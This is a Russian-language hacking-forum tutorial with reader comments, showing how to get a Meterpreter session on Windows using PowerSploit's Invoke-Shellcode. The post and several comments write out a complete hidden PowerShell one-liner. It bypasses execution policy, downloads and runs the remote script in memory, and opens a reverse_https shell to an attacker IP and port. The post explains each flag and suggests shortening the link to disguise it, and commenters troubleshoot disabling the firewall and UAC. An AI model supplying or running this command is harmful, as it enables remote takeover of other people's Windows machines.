PowerShell для хакера (часть I )

Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

logo.png


Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1.PNG


Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде
Код:
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

3.PNG


Копируем урл нашего скрипта и готовим следующую команду:
Код:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
-NoP (--NoProfile) Не использовать пфрофиль powershell
-NonI (--NonInteractive) Не использовать интерактивный режим
-W Hidden ( --Window Hidden) Не показывать окно командной строки
-Exec Bypass ( Bypass Execution Policy) Разрешить подгружать и использовать скрипты из внешних ресурсов
IEX(New-Object Net.WebClient).DownloadString('url нашего скрипта') - Выполнить скрипт путем загрузки его по урл из удаленного ресурса и загрузки его в памяти
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
Собственно вызов нашего скрипта после его загрузки с параметрами (IP аддрес и порт Атакуещей машини) и тип пейлоада метасплоита.
5.PNG


6.PNG


Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части
 
Ничего не понятно...что копировать и куда вставлять и что менять?
 
Ничего не понятно...что копировать и куда вставлять и что менять?
Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...
 
Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...
А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут
 
А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут
Мануал расчитан,на то что у людей которые его читают есть хоть какое то понятие о том что они делают. Вы уж простите ,но если вы ничего не поняли с этого мануала - то будет лучше для вас и окружающих если прекратите свои експеременты...
 
Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?
 
Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?
Да, я демонстрирую это на виртуальных машинах:
Во первых - это этично
Во вторых - как вы себе представляете фото и видео на камеру таких демонстраций.
Интересно... Назовите причины , по которым это не будет работать на реальных устройствах.
 
Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams
 
Как не открою ваши статьи, так обязательно что-то очень "привлекательное" увижу :) спасибо большое
 
  • Нравится
Реакции: <~DarkNode~>
Классная статья
 
  • Нравится
Реакции: <~DarkNode~>
Спасибо, за статьи
 
  • Нравится
Реакции: <~DarkNode~>
Спасибо за статью!)
 
Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams
Запомни святую истину, всё, что работает в одном сегменте сети будет работать и в другом в том числе и в интернете
 
Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.
 
Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.
Хааааххх. Начиная с вин 7, пауэршелл не просто акутален а стало основной пушкой которой до сих пор можно даже винду раздолбать. Совсем недавно я демонстрировал как подгрузить макрос с ПШ в ексельку.
 
  • Нравится
Реакции: ghostphisher
что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?
 
Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?
 
Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?
Возьми https
 
Что то блочит тебя. Тут я уже не волшебник, чтобы угадывать.
 
  • Нравится
Реакции: <~DarkNode~>
Возник вопрос,возможно не по теме....Но как можно сохранить сессию по данному способу так,что бы к ней можно было подключиться из под другой сети ?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab